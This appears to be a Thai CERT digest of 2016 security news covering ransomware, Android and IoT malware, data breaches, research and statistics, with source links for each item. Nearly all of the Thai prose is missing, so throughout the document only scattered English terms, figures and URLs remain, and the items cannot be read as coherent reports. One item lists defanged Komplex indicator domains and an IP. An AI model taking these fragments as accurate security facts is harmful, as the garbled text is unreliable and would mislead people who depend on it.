MaxMitek Inc, Fatty Studio, Gig Mobile, TrueApp Lab, Sigourney Studio, Doril Radio.FM, Finch Peach Mobile Apps Mothrr Mobile Apps
Spyware
Google
IMEI

: 04/08/2559
: Softpedia <http://thcert.co/9TSk71>,
Dr.Web <http://thcert.co/0RfGlK>


Shortcut

Properties shortcut)
shortcut


- executable shortcut
.exe, .com, .scr shortcut

- .docx, .pdf
shortcut
- .js, .vbs

Target shortcut

cmd.exe (Command Prompt Windows)
Sophos
shortcut .js

shortcut
.lnk shortcut
shortcut shortcut
Properties
Windows shortcut
shortcut
(
Target shortcut






: 05/08/2559
: Naked Security <http://thcert.co/jiDu8c>

Cerber

2559 Cerber
Cerber
.cerber2 ( .cerber)



Cerber
2559 Cerber



Trend Micro


Cerber

: 08/08/2559
: Softpedia <http://thcert.co/WyIwAo>,
Fuzzer <http://thcert.co/CPyDIU>

Svpeng Android
Google AdSense

Kaspersky )
Svpeng
Android SMS



Google
AdSense

Android Device Administrator
Google AdSense (
) Factory Reset

Android
.apk Google AdSense


.apk ( https://www.thaicert.or.th/papers/general/2014/pa2014ge004.html)
Android
Device
Administrator (

: 17/08/2559
: Business Insider <http://thcert.co/XHpCUY>,
SecureList <http://thcert.co/DXUFO1>

FireEye


2559
Locky
.DOCM
Microsoft Word
Macro 2559

88%
2559
FireEye
Locky
2559 17,000






: 23/08/2559
: FireEye <http://thcert.co/qBO5iH>,
ZDNet <http://thcert.co/00itos>

Rex Linux
Bitcoin DDoS


Stormshield Dr.Web
Rex

Linux Rex
CMS Drupal
Wordpress
- Stormshield (https://thisissecurity.net/2559/08/17/from-website-locker-to-ddos-rex/)

Bitcoin
(Command & Control)
- Dr.Web (http://vms.drweb.com/virus/?_is=1&i=8436299)
DDoS
Drupal
CVE-2014-3704 (Drupalgeddon) SQL Injection
: 23/08/2559
: Softpedia <http://thcert.co/q6PZMr>

Wordpress

CMS
Magento

Wildfire

Wildfire No More Ransom


Europol



.wflx
1.5
Bitcoin 3




Wildfire

No More Ransom (https://www.nomoreransom.org/decryption-tools.html)
1

136 Bitcoin
2.7
: 26/08/2559
: ZDNet <http://thcert.co/lBf7di>

Pegasus iOS

iOS 9.3.5 !

25 2559 Pegasus
Apple iOS 9.3.5 NSO Group
3
iOS
Pegasus
Pegasus iOS 3
CVE-2016-4655, CVE-2016-4656
CVE-2016-4657 3
2559
Citizen Lab Lookout

Lookout Pegasus

Pegasus
iOS

3
GPS Apple Apple
iOS 9.3.5
iOS

: 26/08/2559
: Citizen Lab <http://thcert.co/wEcu2J>,
Lookout <http://thcert.co/jmDSgf>

Locky
DLL

Locky .zepto ( Zepto


2558 Locky) (
)

2559
.DLL



.ZIP
.DLL JavaScript
.DLL
Windows Script Host
JavaScript VBScript
Windows Explorer
JavaScript
JavaScript
.DLL
Microsoft (https://technet.microsoft.com/en-us/library/ee198684.aspx)
Process



: 29/08/2559
: Softpedia <http://thcert.co/xeHRkS>,
Cyren <http://thcert.co/90bSdG>

Transmission ()
Keydnap Mac OS X

28 2559
transmissionbt.com
Transmission

Linux
Mac OS X
Transmission
( http://transmissionbt.com/keydnap_removal/)
2.92

Transmission
Transmission
Keydnap 6 2559
KeRanger
Transmission




Transmission

hash
: 31/08/2559
: We Live Security <http://thcert.co/KXJyXg>,
Transmission <http://thcert.co/3p60wY>

DressCode Google Play Store


Botnet

CheckPoint
Android Google
40 Google
Play Store Play Store
DressCode Android

DressCode
Google Play Store
2559
2
Botnet




: 01/09/2559
: Softpedia <http://thcert.co/eqyiz7>,
CheckPoint <http://thcert.co/gphLgW>

Cerber

Trend Micro
2559 Cerber Cerber 3.0
3.0

.cerber3
.cerber2


: 01/09/2559
: Trend Micro <http://thcert.co/1zw6V3>,
Bleeping Computer <http://thcert.co/iwhWq9>

Gugi
Android 6

Kaspersky
Android Gugi

Android 6
drawing over other apps Gugi


SMS


device administrator









Google Play
SMS Android 6
(permission)
(command & control) SMS

Android 6

(Marshmallow) Google





Gugi
Gugi 2558 Gugi

2559

Gugi

safe mode (
power Play Store
safe mode
)

: 07/09/2559
: Kaspersky <http://thcert.co/dB2lPz>


NAS Seagate
Sophos
Mal/Miner-C
Monero ( Bitcoin
(cryptocurrency) ) Sophos
NAS
17,000
Sophos NAS
NAS Seagate Seagate Central
Seagate Central

7,000
( 70%
) Sophos NAS

Photo.scr





: 13/09/2559
: Sophos <http://thcert.co/VZZxxq>

iOS 75
App Store
Trend Micro

iOS Haima
(adware)
iOS
75

Haima IMEI IP

enterprise App
App Store Store


iOS
App Store

()

: 14/09/2559
: Softpedia <http://thcert.co/dEVqKg>,
Trend Micro <http://thcert.co/jrQEIV>

.hta

Malwarebytes

.hta


.hta (HTML Application)
HTML
Internet Explorer

.hta
VBScript
JavaScript

.hta

PowerShell

Kovter Cerber

: 15/09/2559
: Malwarebytes <http://thcert.co/gqpJPC>

Guide for Pokemon GO Play Store


root
Kaspersky
Android Android root
Guide for Pokemon GO
Google Play Store



Pokemon Go root

Kaspersky
Google
500,000 Play Store



Google Play

: 15/09/2559
: Softpedia <http://thcert.co/j1w54c>

Komplex Mac OS X

Palo Alto Networks PDF

Komplex
Mac OS X

(aerospace industry)


MacKeeper Komplex
Remote Code Execution
(
)

3
Sofacy Group

Mac OS X
(
MacKeeper )



IP
PDF


- appleupdate[.]org - itunes-helper[.]net
- apple-iclouds[.]net - 185.10.58.170

: 27/09/2559
: PC World <http://thcert.co/5acxiQ>,
Palo Alto Networks <http://thcert.co/N7do2J>

Xiny Android Play Store


root
Dr.Web root
Xiny Android
Xiny root
Android Google
Play Store (
) root
(inject)

Google Play Store
steganography




Xiny
Device Administrator
Android

(
)
Xiny
: 28/09/2559
: Graham Cluley <http://thcert.co/OmtfLQ>,
Dr.Web <http://thcert.co/MNAVVt>

MarsJoke
96
Proofpoint


0.7 Bitcoins
22 2559 (320 10,000
)
96





file_6.exe
MarsJoke

: 28/09/2559
: ZDNet <http://thcert.co/xMbD3Y>


Xpan remote desktop
Kaspersky
remote desktop
Xpan Kaspersky

TeamXRat
http://support.kaspersky.com/


Kaspersky
brute force remote desktop

remote desktop brute force

brute force




.___xratteamLucked

1 bitcoin (
20,000 )
: 30/09/2559
: Softpedia <http://thcert.co/uPInia>,
Kaspersky <http://thcert.co/sk3HNz>

Mirai IoT
DDoS
Brian Krebs backdoor

Mirai
botnet
IoT
IoT (Internet of Things)
DDoS


DDoS


Mirai

IoT

: 03/10/2559
: Krebs on Security <http://thcert.co/hW8G1i>,
Dr.Web <http://thcert.co/Xb4uxK>

Cerber
4
2559
Cerber Cerber

.cerber3
4
( .b71c)
README.hta

Cerber


( MySQL, Microsoft SQL)

: 07/10/2559
: Bleeping Computer <http://thcert.co/7q2rR3>

Symantec Odinaff
macro

Symantec Symantec
Odinaff
SWIFT


2559 3


Microsoft Office macro Symantec


macro

: 12/10/2559
: Symantec <http://thcert.co/votZ7X>

NyaDrop
IoT Linux

Malware Must Die


honeypot (
NyaDrop IoT
Linux )

IoT



DDoS
proxy
IoT CPU MIPS 32 bit IoT
( , DVR, )

: 17/10/2559
: Softpedia <http://thcert.co/Ko6Np2>,
Malware Must Die <http://thcert.co/bpM7gb>

Mirai
Sierra Wireless

Sierra Wireless
Aircard, 3G Wi-Fi Sierra Wireless LS300,
GX400, GX/ES440, GX/ES450
RV50
Mirai
Mirai
(Internet of Things - IoT)
Sierra Wireless (http://source.sierrawireless.com/~/media/support_downloads/airlink/docs/technical%20bulletin/sierra%20wireless%20technical%20bulletin%20-%20mirai%20-%204oct2016.ashx?la=en)





Mirai
DDoS

: 18/10/2559
: ZDNet <http://thcert.co/OE07nY>,
ICS-CERT <http://thcert.co/TGlmmd>

Microsoft
Locky .LNK

Microsoft
Locky shortcut
.ZIP Sophos

.LNK cmd.exe
shortcut
(downloader)


shortcut ( .LNK)
Target shortcut
PowerShell

: 20/10/2559
: Microsoft <http://thcert.co/ZwTiMS>

Google AdWords
macOS

macOS (

macOS)
( )
Google AdWords
keyword OSX/InstallMiez


Google
25 2559

keyword Google AdWords
Google Chrome macOS

Google Chrome
Google

Google Chrome

: 02/11/2559
: Cylance <http://thcert.co/DylziN>

Svpeng Google Chrome


Android .apk
2559 Kaspersky .apk

Svpeng Android Google Chrome Android

Google Google Google
AdSense AdSense
Google Chrome
0-day Google Chrome Android
55 ( Google Chrome 54)
.apk Android

2559
Kaspersky
Svpeng 318,000


JavaScript
.apk 1,024




.apk
.apk

: 08/11/2559
: Ars Technica <http://thcert.co/hXGhKz>,
Best Security Search <http://thcert.co/S1w5lR>,
Securelist <http://thcert.co/Jpb5Nd>

Mirai (DVR)

Mirai
Internet of Things (IoT)

(
Mirai DDoS )
1 Tbps



IoT
IoT
IoT



(CCTV) Mirai IoT

(DVR)
https://www.thaicert.or.th/papers/general/2016/pa2016ge001.html

: 21/11/2559
: The Register <http://thcert.co/Mo4eUj>,
Pen Test Partners <http://thcert.co/yj6eCv>


Facebook

Facebook
Facebook .svg
.svg Nemucod Locky

Facebook


.svg
JavaScript

.svg

(extension)
Google Chrome Facebook
Facebook
.svg
https://www.thaicert.or.th/alerts/user/2016/al2016us001.html

: 22/11/2559
: The Hacker News <http://thcert.co/5iNVor>,
Blazes Security Blog <http://thcert.co/mIx4lo>

Keygen

Symantec Symantec
Gatak
Stegoloader


Keygen







Keygen


SketchList3D,
BobCAD-CAM, Siemens SIMATIC STEP 7,
CadSoft Eagle Professional,
Manctl Skanect Keygen


: 28/11/2559
: Beta News <http://thcert.co/r3NZ5I>,
Security Week <http://thcert.co/VoEeQp>,
Symantec <http://thcert.co/cL87hs>

Gooligan Android
root Google Account
Check Point
Gooligan Google

Android
root


Google 2559 Android
1

Check Point
Google
Play
Store

root
https://gooligan.checkpoint.com/
VROOT (CVE-2013-6282)
Towelroot (CVE-2014-3153)
root Android 4-5 factory reset

root


(inject)
Google Play Google Mobile Services
Google
: 01/12/2559
: Check Point <http://thcert.co/7uG9xx>

Android

Dr.Web
Android
.
7 MID, Explay Imperium 8, Perfeo 9032_3G, Prestigio MultiPad Wize 3021 3G, Prestigio MultiPad PMT5001 3G, Ritmix RMD-1121, Oysters T72HM 3G, Irbis tz70, Jeka JK103

Android.DownLoader.473.origin Android.Sprovider.7 Dr.Web
17/12/2559

Lenovo A319, Lenovo A6000, MegaFon Login 4 LTE, Bravis NB85, Bravis NB105, Irbis TZ85, Irbis TX97, Irbis TZ43, Irbis tz56, Pixus Touch 7.85 3G, SUPRA M72KG, SUPRA M729G, SUPRA V2N10, Itell K3300, Digma Plane 9.7 3G, General Satellite GS700, Nomi C07000, Optima 10.1 3G TT1040MG, Marshal ME-711,
Lenovo
A6000
http://www.lenovomobileth.com
: 14/12/2559
: The Hacker News <http://thcert.co/9rck6w>,
Dr.Web <http://thcert.co/aegbz0>

Super Mario Run Android



15 2559
Nintendo Super Mario
Run iOS Pokemon GO

Android Play Store





Super Mario
Super Mario Run
.apk
SMS
GPS

: 23/12/2559
: Hackread <http://thcert.co/SqgASH>,
Trend Micro <http://thcert.co/STQDth>

Privacy

FBI Apple iOS

Apple
FBI Apple
iPhone Backdoor
iPhone Apple
iOS
Data Protection
Apple FBI
FBI Data Protection
Apple (Backdoor) iOS 8 Passcode

Apple (Passcode)

FBI Apple

: 18/03/2559
: The Hacker News <http://thcert.co/WzJDSt>

Home Depot 19.5



Home Depot

2557
50 Home Depot

19.5 43
Call Center
10,000

: 25/03/2559
: ThreatPost <http://thcert.co/e1ET4T>

QQ Browser

Citizen Lab
QQ Browser
QQ Browser
Tencent Android
Windows, Mac, .apk
iOS Android man-in-the-middle .apk

QQ Browser Windows

.exe
QQ Browser Android
Windows
IMEI, IMSI, Wi-Fi
, ,

, 2559 Tencent
, QQ Browser
QQ
Browser
: 31/03/2559
: Citizenlab <http://thcert.co/RBlK18>

CNBC

CNBC
CNBC
Google Docs




CNBC

HTTP


Google Docs



: 31/03/2559
: BGR <http://thcert.co/ycb4d0>

50
6 2559
2551
50
- (80 )


: 07/04/2559
: Wired <http://thcert.co/qXnZ7Q>

27 2559

Web Defacement 9




1.3

15.8
2553
: 08/04/2559
: Trend Micro <http://thcert.co/zdEcvF>





Privacy International


2544
(MI5, MI6 GCHQ) Investigatory Powers



: 22/04/2559
: Ars Technica <http://thcert.co/3Tb9aK>

VPN Opera
Proxy
Opera 2558)
Proxy
VPN
Michal Spacek


VPN Proxy Opera
Proxy
Opera
VPN Opera VPN
api.surfeasy.com (
VPN Opera
: 25/04/2559
: Help Net Security <http://thcert.co/CW1HdS>



93.4
Amazon Web Service (AWS) 2558
15.8

50


AWS



Amazon

: 25/04/2559
: Network World <http://thcert.co/UuQvnR>

1.5 GB
SQL injection

(Qatar National Bank QNB)
1.5 GB
SQL injection



: 29/04/2559
: Security Affairs <http://thcert.co/T06850>,
BTimes <http://thcert.co/PkVrhH>

Facebook 2558
13%

6
Facebook 3
3
Facebook
(Transparency report)
Facebook
(https://govtrequests.facebook.com/country/Thailand/2015-H2/)

2015
46,763
6 2558
13% 60%

: 29/04/2559
: The Register <http://thcert.co/Umz1OH>

Telegram
SMS OTP
2 (2-step verification)
Telegram
SMS OTP



29 2559
SMS
Telegram
SMS
(One Time Password - OTP) SMS

SMS Telegram

log Telegram
IP

Telegram




2559
Telegram
: 02/05/2559
: Bellingcat <http://thcert.co/DYRuoC>

NHS
1.6 Google AI
New
Scientist
Google
NHS (National Healthcare System) (Opt-in)
Google
1.6 (Opt-out)
Streams





HIV Google

: 02/05/2559
: The register <http://thcert.co/LKP2YR>

Google, Yahoo, Microsoft 272



Alex Holden

Mail.ru, Google, Yahoo Microsoft
272.3


Mail.ru Microsoft

2 (2-Factor Authentication)
Google
Yahoo SMS


Google, Yahoo Microsoft

2
(https://www.thaicert.or.th/papers/general/2015/pa2015ge001.html)

: 06/05/2559
: Reuters <http://thcert.co/GgAHKF>

Twitter

Dataminr

Twitter Twitter

Dataminr
Twitter Dataminr

NSA
John C. Inglis
NSA Twitter

NSA

: 10/05/2559
: CSO <http://thcert.co/cQY4fD>

Runkeeper

Norwegian Consumer Council (NCC) FitnessKeeper Runkeeper


GPS




Runkeeper Runkeeper







Runkeeper

: 17/05/2559
: Help Net Security <http://thcert.co/vChkvI>

! LinkedIn
2555

2555 LinkedIn LinkedIn





LinkedIn LinkedIn

2559

LinkedIn 2555

: 19/05/2559
: Smart Company <http://thcert.co/Me51YB>

LinkedIn
123456

18 2559 LinkedIn
LinkedIn
LinkedIn
100
LinkedIn
LinkedIn
2555

Leaked Source 2
(2-Factor Authentication)
5 123456, linkedin, password, 123456789 12345678



: 23/05/2559
: LinkedIn <http://thcert.co/mp6gTX>,
Leaked Source <http://thcert.co/y0FtV0>

Anonymous
33


Anonymous

33

SQL Excel 10 DDoS







: 24/05/2559
: Softpedia <http://thcert.co/QshRPx>

Facebook

Facebook Facebook



Google, Twitter

Facebook
2
Facebook



Facebook Twitter
https://twitter.com/privacy

Facebook
Titan
URL
https://www.facebook.com/policy.php

Google

https://privacy.google.com/data-we-collect.html
: 24/05/2559
: The Hacker News <http://thcert.co/O3ZjFp>

Tumblr

Tumblr Tumblr


Tumblr 2
2556 (2-Factor Authentication)

65
Tumblr (https://www.tumblr.com/docs/en/account_security)

Have I been pwned?

Tumblr
https://haveibeenpwned.com

: 31/05/2559
: Motherboard <http://thcert.co/Pf1OKh>



FBI
2559
LinkedIn, Tumblr
MySpace




FBI
FBI






( 2 5 Bitcoin
38,000 95,000 )

: 03/06/2559
: FBI <http://thcert.co/3IhlBU>

TeamGhostShell
MongoDB 36

TeamGhostShell

MongoDB MongoDB
NoSQL




MongoDB

Security Checklist
MongoDB (https://docs.mongodb.com/manual/administration/security-checklist/)

: 06/06/2559
: Hackread <http://thcert.co/AL9Jgf>

Facebook Netflix


LinkedIn, Tumblr
MySpace




Facebook Netflix





2

Adobe
3 Facebook


: 08/06/2559
: ZDnet <http://thcert.co/wahIwQ>

Flash Keyboard Play Store



Pentest
Flash
Keyboard Google
Play Store
Flash Keyboard



Flash Keyboard
Android
DotC United (http://www.dotcunited.com/flashkeyboard.html)

50
https://regmedia.co.uk/2016/06/07/pentestflashkeybpardpaper.pdf

GPS SMS

( )

IMEI





SMS
Settings

Android 6.0
: 09/06/2559
: The Register <http://thcert.co/LWUXn4>

GitHub
2FA

GitHub
GitHub
14
2559
GitHub GitHub



2
(2-Factor Authentication)


GitHub (https://help.github.com/articles/providing-your-2fa-authentication-code/)

: 16/06/2559
: GitHub <http://thcert.co/TdrlfS>

Mark Zuckerberg


Mark Zuckerberg
Facebook
Facebook

Spyware



: 22/06/2559
: The Next Web <http://thcert.co/8XQzO0>

LogMeIn


LogMeIn
(accounts.logme.in)


LogMeIn
Remote Desktop
2

: 22/06/2559
: Help Net Security <http://thcert.co/zyfVqf>


154


154 2558

2


()

L2




: 24/06/2559
: Naked Security <http://thcert.co/Lnna1R>,
The Daily Dot <http://thcert.co/P8wCcM>

Google

Google
Google





(https://privacy.google.com/data-we-collect.html)

Google Privacy Checkup (https://myaccount.google.com/privacycheckup/)

2559


Google
My Activity (https://myactivity.google.com/myactivity)

: 01/07/2559
: Life Hacker <http://thcert.co/toDIKj>

22

Catholic Health Care Services
650,000
( 22 )






: 14/07/2559
: iMedicalApps <http://thcert.co/7a1MPw>

Maxthon Browser

Maxthon Browser Maxthon Browser





CEO
Maxthon Browser


Maxthon Browser



Google Maxthon
Browser


Maxthon Browser


Exatel




: 15/07/2559
: Softpedia <http://thcert.co/ggYSZD>

EFF

Electronic Frontier Foundation
(EFF) PDF

Operation Manul



Remote Access Trojan (RAT) Bandook
JRat
(Spear Phishing)





: 05/08/2559
: Softpedia <http://thcert.co/LSsfmk>,
EFF <http://thcert.co/U7YYXL>

Dota 2
2
Dota 2 (http://dev.dota2.com)
Dota 2
vBulletin LeakedSource

10 80%
2559
IP
2 Dota 2

: 10/08/2559
: ZDNet <http://thcert.co/OsDcih>,
LeakedSource <http://thcert.co/r4TbZf>

Minecraft World Map


71,000
Minecraft World Map (http://www.minecraftworldmap.com/)
Minecraft World Map
Minecraft
29 https://haveibeenpwned.com/
2559

2559

71,000
: 31/08/2559
: The Register <http://thcert.co/0mdOol>

Dropbox 60

31 2559 Dropbox Dropbox


Dropbox
60 ( )
https://haveibeenpwned.com/

Dropbox
Dropbox 2555

Dropbox

Dropbox
2555 2

Dropbox (https://www.dropbox.com/en/help/363)

: 31/08/2559
: TechCrunch <http://thcert.co/yfqm8N>,
The Register <http://thcert.co/FdMOpl>

Seagate

Seagate
social engineering
14 2559





2559
Seagate
CEO
W-2
Seagate


10,000



: 13/09/2559
: Softpedia <http://thcert.co/QHS9lJ>

Yahoo 500

22 2559 Yahoo
Yahoo

500
2557
Yahoo
2

( bcrypt) SMS


Yahoo
(https://www.thaicert.or.th/papers/general/2015/pa2015ge001.html)

: 23/09/2559
: CNN <http://thcert.co/4M4pOu>,
Yahoo <http://thcert.co/HmcS5u>

Dropbox 60

2559
Dropbox
Dropbox 60 2
Dropbox (https://www.dropbox.com/en/help/363)

(
)



Dropbox
2557


: 05/10/2559
: Hackread <http://thcert.co/dqsdel>

Dailymotion
85
Dailymotion
Dailymotion
85.2 20 2559
Dailymotion
18.3

: 06/12/2559
: ZDNet <http://thcert.co/RWHWu5>

Research & Education




VR





3
University of Stuttgart, Saarland University Max Planck Institute for Informatics
97%

: 21/04/2559
: Gizmodo <http://thcert.co/UTM7q7>



2559
University of West Florida
Virginia Department of Education












: 20/06/2559
: University of West Florida <http://thcert.co/FIm2IY>,
WSET <http://thcert.co/zR5nxg>

KeySniffer


Bastille KeySniffer

Bluetooth
10 Logitech, Dell Lenovo

Bluetooth



2553
KeyKeriki 2558
KeySweeper
Anker, EagleTec, General Electric, Hewlett-Packard, Insignia, Kensington, Radio Shack, Toshiba

100
250
76

: 28/07/2559
: Security Affairs <http://thcert.co/CHS9iM>,
KeySniffer <http://thcert.co/w0wQOP>


/
Princeton University





HTML5 API








Firefox
VPN
Chrome



: 05/08/2559
: The Guardian <http://thcert.co/rKxJq8>,
IACR <http://thcert.co/bM1ifR>

Carnegie Mellon

Passphrase




16-64


NIST (National Institute for Standards and Technology)


60-90

Password Manager KeePass
P@ssw0rd1
P@ssw0rd2

: 15/08/2559
: Washington Post <http://thcert.co/U7x4Yl>

white-hat hacker
100
The Japan News
(The Internal Affairs and Communications Ministry)
25
1
2560
white-hat hacker


(cyber drill)
2



100



(National Institute of Information and Communications Technology NICT)



: 06/09/2559
: The Japan News <http://thcert.co/gD44Lp>

CrowdStrike


-



-

-
cloud



-





: 06/09/2559
: CrowdStrike <http://thcert.co/XrgrPR>

F-Secure Helsinki


F-Secure
Helsinki
()
Cyber Security Base with F-Secure


2558
25
2559
209,000 2562 (http://mooc.fi/courses/2559/cybersecurity/)
1.5
Cyber Security Base with F-Secure






: 14/09/2559
: Voice & Data <http://thcert.co/saPW4E>

iPhone 5c

iOS iPhone
( NAND Chip)


10 9


2559 FBI
iPhone 5c iPhone 5c


FBI
Apple iOS

3,000

Apple 40 PIN 4

6

iPhone 5c
( iPad iPhone https://www.youtube.com/watch?v=tM66GWrwbsY)
(http://arxiv.org/abs/1609.04327)
: 21/09/2559
: Threat Post <http://thcert.co/wFX3yh>,
Ars Technica <http://thcert.co/UHA50H>,
CNN <http://thcert.co/1rjJsJ>

Europol
2559

Europol ATM
NFC

2559 Internet Organised Crime Threat Assessment
5.
8

6. Darknet
1.
(Crime-as-Service)



7. social engineering

CEO fraud
2.


3. 8. Bitcoin


4.


: 29/09/2559
: Help Net Security <http://thcert.co/GOv7KZ>,
Europol <http://thcert.co/io7ntU>


(NCSC) 700

NCSC

(National Cyber Security Centre NCSC)
(Bank of England)


(critical infrastructure)

700
Ciaran Martin

GCHQ CEO NCSC
: 03/10/2559
: Security Affairs <http://thcert.co/wOCfPb>

University of Washington


(
Bluetooth Wi-Fi)




50

25

: 05/10/2559
: Engadget <http://thcert.co/M30rLs>,
University of Washington <http://thcert.co/iBHgeS>


Smart Nation

10 2559


4 (National Cybercrime Action Plan)

2559






(Cyber Security Agency of Singapore - CSA)

(National Cyber Incident Response Team)
(National Cyber Security Centre)
(Cybersecurity Act)

Cyber Security Associates and Technologists (CSAT)
3
6
2560



: 10/10/2559
: Channel News Asia <http://thcert.co/zU5PGt>

Singtel
cybersecurity

-
(National University of Singapore
NUS) Singtel (Internet of Things and industrial
control systems)

(NUS-Singtel Cyber -
Security Research and Development (cyber-
Laboratory) security systems based on quantum
technology)




30




4
5
- 100 NUS
(data and cloud security) Singtel

- 120
(predictive security analytics)

: 28/10/2559
: ZDNet <http://thcert.co/jUxQwJ>

CPU
machine learning

Binghamton University

CPU


National Science Foundation
275,000
3
CPU

machine learning

CPU

: 09/11/2559
: Phys.org <http://thcert.co/qgxp3h>,
Binghamton University <http://thcert.co/aoEXVX>


Philips Hue


Philips Hue


ZigBee (Internet
(symmetric key) of Things IoT)


400

Philips

Philips Hue









: 14/11/2559
: The Register <http://thcert.co/VGLitA>,
<http://iotworm.eyalro.net>

IBM

IBM X-force Incident


Response and Intelligence Services



153,000





1

DDoS





(Internet of Things
IoT) Cloud


: 21/11/2559
: Threatpost <http://thcert.co/XyvGFC>


(
YouTube https://www.youtube.com/watch?v=ez3o8aIZCDM)




RealTek


Ben Gurion



RealTek







: 25/11/2559
: Wired <http://thcert.co/E4eA1D>,
<http://thcert.co/L2nUFH>

Malaysian Digital Economic


Corporation (MDEC) Protection
Group International (PGI)

(Cybersecurity
Academy)

2 2562


UK-APAC Centre of Security
Excellence




Government
Communication Headquarters (GCHQ)

: 13/12/2559
: Infosecurity Magazine <http://thcert.co/jJAUBm>,
Hakin9 <http://thcert.co/DeKvq6>

NIST NSRL

15 2559 NIST
(digital forensics) Android
iOS 23,000
NSRL
(data reduction) 200,000


(
)
(hash)


RDS Hashsets
NIST (http://www.nsrl.nist.gov/)



National Software Reference Library
(NSRL) NIST
RDS Hashsets

: 19/12/2559
: CSO <http://thcert.co/nC3TzT>,
NIST <http://thcert.co/56Jcdg>

Statistics

2558
Star Wars

SplashData


2558
1 2 123456
password

Star Wars

starwarssolo
princess
: 20/01/2559
: Gizmodo <http://thcert.co/uX5Q1a>

FBI 2.3
2

FBI

2556
2559 17,000
Botnet
2.3
Mimecast

67% 2556

: 11/04/2559
: Softpedia <http://thcert.co/HGwQiQ>

Apple iOS 80
Touch ID 89%

Apple Apple
iOS
80
iPhone/iPad 89%
Touch ID
Apple Touch
ID



: 25/04/2559
: Apple Insider <http://thcert.co/r3mPCl>

Kaspersky
DDoS 2559
Kaspersky
DDoS 10
1 2559 (Kaspersky
DDoS Intelligent Report Q1 2016) 3


3 Syn DDoS
TCP DDoS HTTP DDoS
8




DDoS
: 03/05/2559
: Secure List <http://thcert.co/KpFAJc>

PandaLabs 2559
227,000

PandaLabs
Panda Antivirus

2559 Panda
227,000 (http://www.pandasecurity.com/mediacenter/src/uploads/2016/05/Pandalabs-2016-T1-EN-LR.pdf)





IoT (Internet of Things)

: 10/05/2559
: Panda Security <http://thcert.co/yRWvz7>




Mail.ru, Google, Yahoo, Microsoft
272 https://haveibeenpwned.com/
Google
Mail.ru
98%


Mail.ru
15%

2
(2-Factor Authentication)

,
SMS



Google,

Yahoo Microsoft


: 12/05/2559
: Hold Security <http://thcert.co/it45s9>,
Mail.ru <http://thcert.co/iwn8ID>,
TroyHunt <http://thcert.co/YAjuVu>

Windows 1 4 Internet Explorer


Flash Java
Duo Security Explorer, Adobe Flash Java
Windows 1 4
Internet Explorer
Microsoft
Chrome Firefox
Chrome 82%
Firefox
66%
Adobe
Flash Java 60%
72%





Internet

: 12/05/2559
: Info Security <http://thcert.co/NiNXdX>

Ransomware
90,000
Flashpoint
Deep & 7,500
Dark Web (
Tor) 10-15 600

Ransomware Ransomware
30 300
Ransomware
Ransomware

Ransomware
( Ransomware-as-a-
Service)







: 03/06/2559
: Flashpoint <http://thcert.co/J0HZxN>

Ransomware 2559
10 2558
Ransomware

2-3
FBI


FBI

2559

209 10
2558
25

: 07/06/2559
: LA Times <http://thcert.co/X2Ns7B>

Ponemon Institute

2558 2557
64%



(Data breach)



(Incident Response)
100
3.23
100
70% 4.38






: 17/06/2559
: Help Net Security <http://thcert.co/ylhkdY>

58 59 2.3

Kaspersky
(ransomware) 2558 2558-2559
2559 2557 2,315,931
2558 2557-2558 17.7% ( 2557-2558
1,967,784 )
Android


2557-2559 Android 2559
136,532
4 2557-2558
35,413


718,536
(
) 5.5
2557-2558

: 30/06/2559
: Softpedia <http://thcert.co/zK6IsC>,
Kaspersky <http://thcert.co/TEIVpT>

Blancco

200
eBay Craigslist

67%

11%
36%



(https://www.thaicert.or.th/papers/general/2013/pa2013ge006.html)
: 30/06/2559
: Blancco <http://thcert.co/X0f6M4>


10

Big Brother Watch





Investigatory Powers
(

10 )
2,315
2554-2558
800


800

: 07/07/2559
: Big Brother Watch <http://thcert.co/VTOcBp>



LightCyber
2016 Cyber Weapons Report

50,000


99%





Angry IP
Scanner, Nmap, TeamViewer, WinVNC,
Radmin, WinSCP



LightCyber (http://lightcyber.com/cyber-weapons-report-network-traffic-analytics-reveals-attacker-tools)



: 12/07/2559
: Threatpost <http://thcert.co/vz8ok4>

DDoS 2559
124,000 579 Gbps
Arbor Networks 6
DDoS DNS
2559


Armada Collective


DDoS

2559 DDoS 100,000
124,000
579
Gbps DDoS

- DNS Amplification DDoS Attack
DDoS 1 Gbps (https://www.thaicert.or.th/papers/technical/2013/pa2013te002.html)
6 986 Mbps
- NTP Reflection DDoS attack

(https://www.thaicert.or.th/papers/technical/2014/pa2014te002.html)
1.15 Gbps

Reflection amplification
DNS, NTP, SSDP
: 22/07/2559
: Security Week <http://thcert.co/VecZi4>,
Imperva <http://thcert.co/3swdCG>

88%

Solutionary
Q2 2016 Threat Intelligence Report Solutionary
(https://www.solutionary.com/threat-intelligence/threat-reports/quarterly-threat-reports/sert-threat-report-q2-2016/)
Security Engineering Research Team
(SERT)
2559








88%
6%
4%
: 01/08/2559
: Help Net Security <http://thcert.co/SGLMpL>,
Solutionary <http://thcert.co/F5v7SD>

Kaspersky DDoS 2559


Linux Botnet
Kaspersky -
DDoS 2 2559 3
DDoS
- Linux Botnet - DDoS
2559 291 (12.1 )
Windows Botnet
55.5% Linux Botnet - 3
44.5% 2559 SYN DDoS, TCP DDoS
Windows Botnet HTTP DDoS
29.7% Linux Botnet

70.2%

- 2558
LizardStresser
Botnet
DDoS Lizard
Squad DDoS
2559
-
(Internet of Things)

: 03/08/2559
: Kaspersky <http://thcert.co/JCy7ln>



Healthcare Information
and Management Systems Society
(HIMSS)






32%
52%








10%

: 24/08/2559
: IT World <http://thcert.co/WeOP5Q>

21

SentinelOne
2558 Bournemouth UCL

21


71

23

: 29/08/2559
: MetaCompliance <http://thcert.co/wSb7dl>

2559
200%

Quick Heal
-


2 2559



- (adware)
-






-
-
(Internet
of Things)
2559
200%
-
(ransomware-as-a-service) Quick Heal (http://dlupdate.quickheal.com/documents/others/Quick_Heal_Threat_Report_Q2_2016.pdf)

: 08/09/2559
: Help Net Security <http://thcert.co/gTzC7y>,
Quick Heal <http://thcert.co/7rizDV>

1 5

Trend Micro 300


24 57%

2559 -
25,000
- 44%
24
1 Trend Micro (http://www.trendmicro.co.uk/newsroom/pr/uk-businesses-bullish-about-ransomware-but-majority-pay-up-when-attacked/)
27%
-
74%
65%

- 1 5

-
33%
31%
- 89%

: 09/09/2559
: Infosecurity Magazine <http://thcert.co/O3oiuc>,
Trend Micro <http://thcert.co/1oBd5U>

Blancco


- 30%

Blancco
-

14%
400
11%

10%



9%




- 50%



31%
( NIST
( Recycle Bin) 22%
Special Publication 800-88)


2

- 33% (https://www.thaicert.or.th/papers/general/2013/pa2013ge006.html)
